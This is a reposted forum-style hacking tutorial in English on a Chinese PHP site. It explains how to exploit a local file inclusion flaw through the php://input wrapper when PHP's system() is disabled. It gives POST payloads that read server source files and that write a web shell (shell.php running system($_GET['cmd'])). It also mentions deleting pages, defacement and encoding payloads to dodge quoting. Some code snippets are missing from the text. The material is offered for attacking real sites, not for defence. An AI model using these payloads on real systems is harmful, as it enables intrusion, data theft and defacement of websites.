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How to bypass the restriction of the system function - 网站安

来源:自学PHP网    时间:2015-04-17 13:02 作者: 阅读:

[导读] Requirements :Site vulnerable to LFIShellPhp wrappers musn#39;t be disabledBrain (that can be usefull)Introduction :You found an LFI vulnerability on a website and you want......

Requirements : 
Site vulnerable to LFI
Php wrappers musn't be disabled
Brain (that can be usefull)
Introduction :
You found an LFI vulnerability on a website and you want to shelled it but the configuration of server doesn't allow the utilization of system, shell_exec etc.
Error you would must see :
PHP Warning:  system() has been disabled for security reasons in /home/dir/public_html/index.php on line 374
So you can use /proc/self/environ method but if it doesn't work you cannot upload your shell or your deface page by system function.
Exploitation :
The purpose of this method will be to inject php code into the page to receive expected data from the server.
Another way to read the source :
Example of URL :
http:// /index.php?page=php://input
The php://input is very important.
Open your hackbar and click in "Load URL" then click on "Enable Post Data" and write this in "Post Data".
PHP Code:
echo "<textarea>".file_get_contents('NAMEFILE.EXT')."<textarea>";
The server will return the source code including php in textarea, I use a textarea because on some website it is very unreadable.
Another way to delete a page:
Same step that above but in "Post Data" you will write :
PHP Code:
Another way to upload your shell:
If you don't have knowledge in php it will be a little bit difficult, don't be absentminded .
This time in "Post Data" you will write :
PHP Code:
$f = fopen('shell.php','a+');
fwrite($f,'**');//I used fwrite because fputs was disabled
** = Some explanations is needed, so instead of ** put your code but be careful i'm sure your code contain a lot of quote and you will must escape it.
So I recommended you to use an encryption that is decrypt when the php code is excuted because the encryption won't contain quote.
An example :
PHP Code:
$f = fopen('shell.php','a+');
fwrite($f,'<?php system($_GET[\'cmd\']); ?>');//I used fwrite because fputs was disabled
The real code that is create on the page is :
PHP Code:
on page and to use the script, do like that :

So I think it's all, I hope it will be helpful and you liked it. If you don't understand something or just talk about this method PM me




